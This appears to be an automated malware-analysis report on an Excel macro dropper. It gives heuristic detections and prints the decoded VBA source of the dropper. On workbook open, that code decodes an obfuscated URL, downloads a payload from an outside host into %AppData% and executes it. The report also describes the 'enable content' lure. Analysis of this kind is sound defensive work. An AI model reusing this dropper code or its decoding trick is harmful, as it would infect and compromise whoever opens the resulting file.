Malware Insights
The sample is an Excel document containing VBA macros, including a Workbook_Open macro that runs Sub MLoVnY on document open. MLoVnY uses URLDownloadToFile (declared under the randomized name DDBGe, alias "URLDownloadToFileA" in urlmon) to fetch a payload. Both the download URL and the destination filename are obfuscated string literals — "fyf/`efohusfSF0iuvps0mq/{jc/eqvujyjnfmjo/xxx00;tquui" for the URL and "fyf/xxdd" for the filename — that are decoded at runtime by the helper SRtVuPxW, which reverses the string and then shifts every character code down by one; the quoted strings are therefore the encoded forms, not the plaintext URL. The decoded filename is appended to Environ$("AppData") & "\" to form the drop path (the label "Agent-9369223-0" is the ClamAV signature name, not the dropped filename). The downloaded file is then launched via ShellExecuteA (declared as BIYzzPFHzYBg in shell32.dll) with the "open" verb. The document body explicitly prompts the user to "Habilite el contenido para mostrar esta pantalla." ("Enable the content to display this screen."), a common lure to get the victim to enable macro execution.
Heuristics 8
-
ClamAV: Xls.Dropper.Agent-9369223-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Dropper.Agent-9369223-0
-
Reference to URLDownloadToFile API — critical — SC_STR_URLDOWNLOAD: Reference to URLDownloadToFile API
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
URLDownloadToFile in VBA — critical — OLE_VBA_DOWNLOAD: URLDownloadToFile in VBA. Matched line in script:
Private Declare PtrSafe Function DDBGe Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _ ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long -
Workbook_Open macro — low — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
Sub Workbook_Open() -
Environ() call (env variable access) — low — OLE_VBA_ENVIRON: Environ() call (env variable access). Matched line in script:
CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM -
Reference to ShellExecute API — high — SC_STR_SHELLEXEC: Reference to ShellExecute API
-
Macro/content-enable lure — medium — SE_ENABLE_LURE: Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13452 bytes |
| SHA-256: 0daebabbfc8d649177f2f9ca4092a50dd112bd82200e84c811f3cf240f195011 | | | |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Empty procedure in Module1; it has no body and is not called anywhere in this listing.
Sub Sib()
End Sub
Attribute VB_Name = "SiloHJbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Win32 imports used by MLoVnY. The VBA-side names are randomized; the real
' entry points are the Alias strings.
' ShellExecuteA(hwnd, lpOperation, lpFile, lpParameters, lpDirectory, nShowCmd)
' -- used to launch the dropped file with the "open" verb.
Private Declare PtrSafe Function BIYzzPFHzYBg Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal zYBgeLAULCPbJIwwXgsUoT As Long, ByVal sJVJHBTQnWiokvMNjkuR As String, _
ByVal ycrXexFvbVWUZKE As String, ByVal LpQBRVXPpRwhdQm As String, ByVal cShrZZMzZwJXEVIMmZXRkh As String, ByVal DZyEALOezAKT As Long) As Long
' URLDownloadToFileA(pCaller, szURL, szFileName, dwReserved, lpfnCB)
' -- used to write the remote payload to disk.
Private Declare PtrSafe Function DDBGe Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _
ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long
' Dropper routine, invoked from Workbook_Open.
' Decodes two obfuscated literals with SRtVuPxW (reverse the string, then
' shift each character code down by one), downloads the decoded URL to a
' file under %AppData%, and launches that file via ShellExecuteA "open".
' Three of the declared locals are never used.
Sub MLoVnY()
Dim BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As String ' decoded download URL
Dim eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As String ' decoded destination filename
Dim CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP As String ' full destination path
Dim cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui As String ' unused
Dim QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc As String ' unused
Dim DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD As String ' unused
' Destination filename: "fyf/xxdd" is the encoded form, decoded by SRtVuPxW.
eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM = SRtVuPxW("fyf/xxdd")
' Drop path = %AppData% & "\" & decoded filename.
CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM
' Download URL: encoded literal, decoded with the same routine.
BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn = SRtVuPxW("fyf/`efohusfSF0iuvps0mq/{jc/eqvujyjnfmjo/xxx00;tquui")
' URLDownloadToFileA(0, url, path, 0, 0): fetch the payload to the drop path.
' The return value is ignored, so a failed download still falls through to execution.
DDBGe 0, BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn, CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, 0, 0
' ShellExecuteA(0, "open", path, "", NULL, vbNormalFocus): run the dropped file.
BIYzzPFHzYBg 0, "open", CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, "", vbNullString, vbNormalFocus
End Sub
' Auto-exec entry point: Excel runs this when the workbook is opened with
' macros enabled. It does nothing but hand off to the dropper MLoVnY.
Sub Workbook_Open()
MLoVnY
End Sub
' Padding: not referenced by Workbook_Open or MLoVnY in this listing; only forwards to t5IOznwCrl.
Function rnIkDDisHp4e1dEwtDO8XRgW() As Currency
Call t5IOznwCrl
End Function
' Padding: not referenced by the dropper path in this listing; only forwards to Dp62rz6kt90kDRkudpcs1fW4.
Static Function t5IOznwCrl() As Integer
Call Dp62rz6kt90kDRkudpcs1fW4
End Function
' Padding: not referenced by the dropper path in this listing; only forwards to Jb8AvPk2VR.
Function Dp62rz6kt90kDRkudpcs1fW4() As Single
Call Jb8AvPk2VR
End Function
' Padding: not referenced by the dropper path in this listing; only forwards to TJW8h3uwBHyE3XYkFXIADNkq.
Static Function Jb8AvPk2VR() As Date
Call TJW8h3uwBHyE3XYkFXIADNkq
End Function
' Padding: not referenced by the dropper path in this listing; only forwards to JxU0xFkI7x.
Function TJW8h3uwBHyE3XYkFXIADNkq() As Variant
Call JxU0xFkI7x
End Function
' Padding: not referenced by the dropper path in this listing; only forwards to rzGwrPUM9xS2rvCsRX6OdVek.
Static Function JxU0xFkI7x() As Date
Call rzGwrPUM9xS2rvCsRX6OdVek
End Function
' Padding: not referenced by the dropper path in this listing; only forwards to hx2errEArb.
Function rzGwrPUM9xS2rvCsRX6OdVek() As Variant
Call hx2errEArb
End Function
' Padding: not referenced by the dropper path in this listing; only forwards to DlkYXBK4r3WCbBQoVfs4z78E.
Static Function hx2errEArb() As Double
Call DlkYXBK4r3WCbBQoVfs4z78E
End Function
' Padding: last link of the dead call chain. FZ4yZPaWVH has no definition in
' this extracted source, so the text as shown would not compile; the project's
' compiled p-code (dumped as comments at the end of this listing) uses different
' identifiers, so the source stream and p-code may not match — worth confirming.
Function DlkYXBK4r3WCbBQoVfs4z78E() As Single
Call FZ4yZPaWVH
End Function
' String de-obfuscation helper used by MLoVnY for both the URL and the filename.
' Algorithm: reverse the input with StrReverse, then append Chr(AscW(c) - 1) for
' each character, i.e. shift every character code down by one. The result is
' accumulated in the local named AppData (an ordinary local Variant, unrelated
' to the environment variable) and returned.
' encv is passed ByRef (VBA default) and is overwritten in place; callers pass
' literals, so this has no visible effect.
' Everything else is padding: tRiy, IKGsottywfg, nt and Fh are assigned on each
' iteration but never read, and the two trailing loops iterate over Len(enc),
' where enc is not declared or assigned anywhere in this listing.
Function SRtVuPxW(encv)
Dim tRiy As String ' dead
Dim IKGsottywfg As Double ' dead
Dim kjJdix ' current character
Dim AppData ' output accumulator
Dim Cntkbor ' loop index
Dim nt As Byte ' dead
Dim Fh As Variant ' dead
encv = StrReverse(encv) ' step 1: reverse the encoded string
For Cntkbor = 1 To Len(encv)
kjJdix = Mid(encv, Cntkbor, 1)
tRiy = "" ' dead store
IKGsottywfg = 20 / 7 / 2290 ' dead store
nt = 1 ' dead store
Fh = 2 ' dead store
AppData = AppData & Chr(AscW(kjJdix) - 1) ' step 2: shift the character code down by one
Next
SRtVuPxW = AppData
For nt = 1 To Len(enc) ' no-op: enc is never assigned in this listing
Next
For Fh = 2 To Len(enc) ' no-op
Next
End Function
' Junk function: not called anywhere in this listing and returns nothing
' meaningful. bonusshoot is never read. Several assignments are type-inconsistent
' (e.g. Byte locals assigned 44414.429 and 19.227; a Boolean assigned 93.904),
' and the Byte assignments exceed the 0-255 range, so this body would raise an
' Overflow error if it were ever executed. The declared name
' be3a8c1f30f1abadd648e22b16fdb57d5 differs from the one assigned
' (...fdb57d7), which only works without Option Explicit in effect.
Function Jnfn(burgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*" ' implicit Variant; never read
Dim be3a8c1f30f1abadd648e22b16fdb57d5 As Double
be3a8c1f30f1abadd648e22b16fdb57d7 = 642.162 ' note: different name from the Dim above
Dim columnwall As Byte
columnwall = 44414.429 ' out of Byte range
Dim t0ea0a0840384a15e019665b2e996b73f As Long
t0ea0a0840384a15e019665b2e996b73f = 564.954
Dim n2b549c2e42dc58d564726b5780212aza As Double
n2b549c2e42dc58d564726b5780212aza = 895.115
dhmpmrvyvrxwv = vbNullString ' implicit Variant; never read
Dim m974e3e334b64ac13b6dec997fbabf21f As String
m974e3e334b64ac13b6dec997fbabf21f = "naiveremove"
Dim b08576ffe41cb67690655f1261f410844 As Byte
b08576ffe41cb67690655f1261f410844 = 19.227
Dim z2c55929d38494d4bf3ab6ba3dd16305c As Boolean
z2c55929d38494d4bf3ab6ba3dd16305c = 93.904
Dim b9d76f7072ca3da29e82e55579143fba0 As Double
b9d76f7072ca3da29e82e55579143fba0 = 108.662
Dim kqeepfyakmzwuediw As Double
kqeepfyakmzwuediw = 61.491
If kqeepfyakmzwuediw <> 189.252 Then ' always True given the assignment above
Dim flamesight As Byte
flamesight = 212.797
Dim sweartrust As Long
sweartrust = 235.981
Dim prqhhqrabc As String
prqhhqrabc = "fadzjgdilazu"
End If
End Function
' Padding: not referenced in this listing. POLk00bh has no definition in the
' extracted source, so this text would not compile as shown (in the p-code dump
' below POLk00bh appears only as a variable name) — source/p-code mismatch worth confirming.
Function yujmngFXscDEwqazzd() As Long
Call POLk00bh
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore_8ch6tx6n
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 950 bytes
' Line #0:
' FuncDefn (Sub sJVJHBTQnWiokvMNjkuR())
' Line #1:
' Line #2:
' EndSub
' _VBA_PROJECT_CUR/VBA/SiloHJbook - 9121 bytes
' Line #0:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function LpQBRVXPpRwhdQm Lib "TfwKSTdBvYbHN" (ByVal cShrZZMzZwJXEVIMmZXRkh As Long, ByVal DZyEALOezAKT As String, ByVal shell32.dll As String, ByVal DDBGe As String, ByVal lsWjjyCFxVleNvySvzNKt As String, ByVal GggHPcEXDbtStEyQAWGRW As Long) As Long)
' Line #1:
' Line #2:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function hpfKFGEJuBIY Lib "CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP" (ByVal zzPFH As Long, ByVal urlmon As String, ByVal MLoVnY As String, ByVal BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As Long, ByVal eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As Long) As Long)
' Line #3:
' Line #4:
' FuncDefn (Sub cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui())
' Line #5:
' Dim
' VarDefn QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc (As String)
' Line #6:
' Line #7:
' Dim
' VarDefn DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD (As String)
' Line #8:
' Line #9:
' Dim
' VarDefn HJUgkOFL (As String)
' Line #10:
' Line #11:
' Dim
' VarDefn Environ (As String)
' Line #12:
' Line #13:
' Dim
' VarDefn vbNullString (As String)
' Line #14:
' Line #15:
' Dim
' VarDefn vbNormalFocus (As String)
' Line #16:
' Line #17:
' LitStr 0x0008 "fyf/xxdd"
' ArgsLd Fh 0x0001
' St DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD
' Line #18:
' Line #19:
' LitStr 0x0007 "AppData"
' ArgsLd rnIkDDisHp4e1dEwtDO8XRgW$ 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD
' Concat
' St HJUgkOFL
' Line #20:
' Line #21:
' Line #22:
' LitStr 0x0034 "fyf/`efohusfSF0iuvps0mq/{jc/eqvujyjnfmjo/xxx00;tquui"
' ArgsLd Fh 0x0001
' St QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc
' Line #23:
' Line #24:
' LitDI2 0x0000
' Ld QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc
' Ld HJUgkOFL
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall hpfKFGEJuBIY 0x0005
' Line #25:
' LitDI2 0x0000
' LitStr 0x0004 "open"
' Ld HJUgkOFL
' LitStr 0x0000 ""
' Ld t5IOznwCrl
' Ld Dp62rz6kt90kDRkudpcs1fW4
' ArgsCall LpQBRVXPpRwhdQm 0x0006
' Line #26:
' EndSub
' Line #27:
' Line #28:
' FuncDefn (Sub Jb8AvPk2VR())
' Line #29:
' Line #30:
' ArgsCall cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui 0x0000
' Line #31:
' EndSub
' Line #32:
' Line #33:
' FuncDefn (Function TJW8h3uwBHyE3XYkFXIADNkq(id_FFFE As Currency) As Currency)
' Line #34:
' ArgsCall (Call) JxU0xFkI7x 0x0000
' Line #35:
' EndFunc
' Line #36:
' FuncDefn (Static Function JxU0xFkI7x(id_FFFE As Integer) As Integer)
' Line #37:
' ArgsCall (Call) rzGwrPUM9xS2rvCsRX6OdVek 0x0000
' Line #38:
' EndFunc
' Line #39:
' FuncDefn (Function rzGwrPUM9xS2rvCsRX6OdVek(id_FFFE As Single) As Single)
' Line #40:
' ArgsCall (Call) hx2errEArb 0x0000
' Line #41:
' EndFunc
' Line #42:
' FuncDefn (Static Function hx2errEArb(id_FFFE As Date) As Date)
' Line #43:
' ArgsCall (Call) DlkYXBK4r3WCbBQoVfs4z78E 0x0000
' Line #44:
' EndFunc
' Line #45:
' FuncDefn (Function DlkYXBK4r3WCbBQoVfs4z78E(id_FFFE As Variant) As Variant)
' Line #46:
' ArgsCall (Call) FZ4yZPaWVH 0x0000
' Line #47:
' EndFunc
' Line #48:
' FuncDefn (Static Function FZ4yZPaWVH(id_FFFE As Date) As Date)
' Line #49:
' ArgsCall (Call) encv 0x0000
' Line #50:
' EndFunc
' Line #51:
' FuncDefn (Function encv(id_FFFE As Variant) As Variant)
' Line #52:
' ArgsCall (Call) tTip 0x0000
' Line #53:
' EndFunc
' Line #54:
' FuncDefn (Static Function tTip(id_FFFE As Double) As Double)
' Line #55:
' ArgsCall (Call) IKGcostIkfg 0x0000
' Line #56:
' EndFunc
' Line #57:
' FuncDefn (Function IKGcostIkfg(id_FFFE As Single) As Single)
' Line #58:
' ArgsCall (Call) kjJdix 0x0000
' Line #59:
' EndFunc
' Line #60:
' Line #61:
' FuncDefn (Function Fh(AppData, id_FFFE As Variant))
' Line #62:
' Dim
' VarDefn nt (As String)
' Line #63:
' Dim
' VarDefn id_02CA (As Double)
' Line #64:
' Dim
' VarDefn Gh
' Line #65:
' Dim
' VarDefn StrReverse
' Line #66:
' Dim
' VarDefn id_02C8
' Line #67:
' Dim
' VarDefn id_02CE (As Byte)
' Line #68:
' Dim
' VarDefn id_02CC (As Variant)
' Line #69:
' Ld AppData
' ArgsLd Jnfn 0x0001
' St AppData
' Line #70:
' StartForVariable
' Ld id_02C8
' EndForVariable
' LitDI2 0x0001
' Ld AppData
' FnLen
' For
' Line #71:
' Ld AppData
' Ld id_02C8
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St Gh
' Line #72:
' Line #73:
' LitStr 0x0000 ""
' St nt
' Line #74:
' LitDI2 0x0014
' LitDI2 0x0007
' Div
' LitDI2 0x08F2
' Div
' St id_02CA
' Line #75:
' LitDI2 0x0001
' St id_02CE
' Line #76:
' LitDI2 0x0002
' St id_02CC
' Line #77:
' Ld StrReverse
' Ld Gh
' ArgsLd bonusshoot 0x0001
' LitDI2 0x0001
' Sub
' ArgsLd burgerorgan 0x0001
' Concat
' St StrReverse
' Line #78:
' StartForVariable
' Next
' Line #79:
' Line #80:
' Ld StrReverse
' St Fh
' Line #81:
' Line #82:
' StartForVariable
' Ld id_02CE
' EndForVariable
' LitDI2 0x0001
' Ld qoxnwkqnhfshhimr
' FnLen
' For
' Line #83:
' Line #84:
' StartForVariable
' Next
' Line #85:
' StartForVariable
' Ld id_02CC
' EndForVariable
' LitDI2 0x0002
' Ld qoxnwkqnhfshhimr
' FnLen
' For
' Line #86:
' StartForVariable
' Next
' Line #87:
' EndFunc
' Line #88:
' Line #89:
' Line #90:
' FuncDefn (Function be3a8c1f30f1abadd648e22b16fdb57d5(be3a8c1f30f1abadd648e22b16fdb57d7, columnwall, id_FFFE As Variant))
' Line #91:
' LitStr 0x0001 "*"
' Ld be3a8c1f30f1abadd648e22b16fdb57d7
' Concat
' LitStr 0x0001 "*"
' Concat
' St t0ea0a0840384a15e019665b2e996b73f
' Line #92:
' Dim
' VarDefn n2b549c2e42dc58d564726b5780212aza (As Double)
' Line #93:
' LitR8 0xEF9E 0xC6A7 0x114B 0x4084
' St dhmpmrvyvrxwv
' Line #94:
' Dim
' VarDefn m974e3e334b64ac13b6dec997fbabf21f (As Byte)
' Line #95:
' LitR8 0x353F 0xBA5E 0xAFCD 0x40E5
' St m974e3e334b64ac13b6dec997fbabf21f
' Line #96:
' Dim
' VarDefn b08576ffe41cb67690655f1261f410844 (As Long)
' Line #97:
' LitR8 0x8312 0xCAC0 0xA7A1 0x4081
' St b08576ffe41cb67690655f1261f410844
' Line #98:
' Dim
' VarDefn z2c55929d38494d4bf3ab6ba3dd16305c (As Double)
' Line #99:
' LitR8 0xB852 0x851E 0xF8EB 0x408B
' St z2c55929d38494d4bf3ab6ba3dd16305c
' Line #100:
' Ld t5IOznwCrl
' St b9d76f7072ca3da29e82e55579143fba0
' Line #101:
' Dim
' VarDefn kqeepfyakmzwuediw (As String)
' Line #102:
' LitStr 0x000B "naiveremove"
' St kqeepfyakmzwuediw
' Line #103:
' Dim
' VarDefn flamesight (As Byte)
' Line #104:
' LitR8 0x3127 0xAC08 0x3A1C 0x4033
' St flamesight
' Line #105:
' Dim
' VarDefn sweartrust (As Boolean)
' Line #106:
' LitR8 0xE560 0x22D0 0x79DB 0x4057
' St sweartrust
' Line #107:
' Dim
' VarDefn prqhhqrabc (As Double)
' Line #108:
' LitR8 0x7CEE 0x353F 0x2A5E 0x405B
' St prqhhqrabc
' Line #109:
' Dim
' VarDefn yujmngFXscDEwqazzd (As Double)
' Line #110:
' LitR8 0x2B02 0x1687 0xBED9 0x404E
' St yujmngFXscDEwqazzd
' Line #111:
' Ld yujmngFXscDEwqazzd
' LitR8 0xD2F2 0x624D 0xA810 0x4067
' Ne
' IfBlock
' Line #112:
' Dim
' VarDefn POLk00bh (As Byte)
' Line #113:
' LitR8 0xDD2F 0x0624 0x9981 0x406A
' St POLk00bh
' Line #114:
' Dim
' VarDefn Sheet1 (As Long)
' Line #115:
' LitR8 0xAC08 0x5A1C 0x7F64 0x406D
' St Sheet1
' Line #116:
' Dim
' VarDefn Sheet2 (As String)
' Line #117:
' LitStr 0x000C "fadzjgdilazu"
' St Sheet2
' Line #118:
' EndIfBlock
' Line #119:
' EndFunc
' Line #120:
' Line #121:
' FuncDefn (Function Sheet3(id_FFFE As Long) As Long)
' Line #122:
' Line #123:
' ArgsCall (Call) Workbook 0x0000
' Line #124:
' EndFunc
' Line #125:
' Line #126:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes